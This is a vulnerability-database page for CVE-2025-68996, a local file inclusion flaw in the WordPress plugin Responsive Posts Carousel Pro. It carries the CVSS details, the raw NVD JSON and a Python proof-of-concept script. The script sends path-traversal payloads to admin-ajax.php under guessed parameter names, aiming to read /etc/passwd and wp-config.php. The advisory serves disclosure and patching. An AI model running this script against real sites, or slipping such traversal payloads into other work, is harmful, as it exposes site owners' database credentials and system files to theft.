Security Vulnerability Report
中文
CVE-2025-68996 CVSS 7.5 HIGH

CVE-2025-68996

Published: 2025-12-30 11:15:58
Last Modified: 2026-04-27 19:16:41

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in WebCodingPlace Responsive Posts Carousel Pro responsive-posts-carousel-pro allows PHP Local File Inclusion.This issue affects Responsive Posts Carousel Pro: from n/a through <= 15.1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Responsive Posts Carousel Pro <= 15.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68996 PoC - Responsive Posts Carousel Pro LFI # Target: WordPress site with Responsive Posts Carousel Pro plugin <= 15.1 import requests import sys target = input("Enter target URL: ").rstrip('/') # Common WordPress config file paths file_paths = [ '../../../../../../../etc/passwd', '../../../../../../../wp-config.php', '../../../../../../../var/www/html/wp-config.php', '../../../wp-config.php', '../../wp-config.php', '../wp-config.php' ] # Try to identify the vulnerable parameter params_to_try = ['load_file', 'file', 'template', 'page', 'view'] for param in params_to_try: for path in file_paths: url = f"{target}/wp-admin/admin-ajax.php" data = { 'action': 'rpc_ajax', param: path } try: response = requests.post(url, data=data, timeout=10) if 'root:' in response.text or '<?php' in response.text: print(f"[+] Potential LFI found!") print(f"[+] Parameter: {param}") print(f"[+] Path: {path}") print(f"[+] Response length: {len(response.text)}") print("=" * 50) except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") print("\n[*] PoC completed. Check results above.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68996", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:15:58.450", "lastModified": "2026-04-27T19:16:40.870", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in WebCodingPlace Responsive Posts Carousel Pro responsive-posts-carousel-pro allows PHP Local File Inclusion.This issue affects Responsive Posts Carousel Pro: from n/a through <= 15.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/responsive-posts-carousel-pro/vulnerability/wordpress-responsive-posts-carousel-pro-plugin-15-1-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}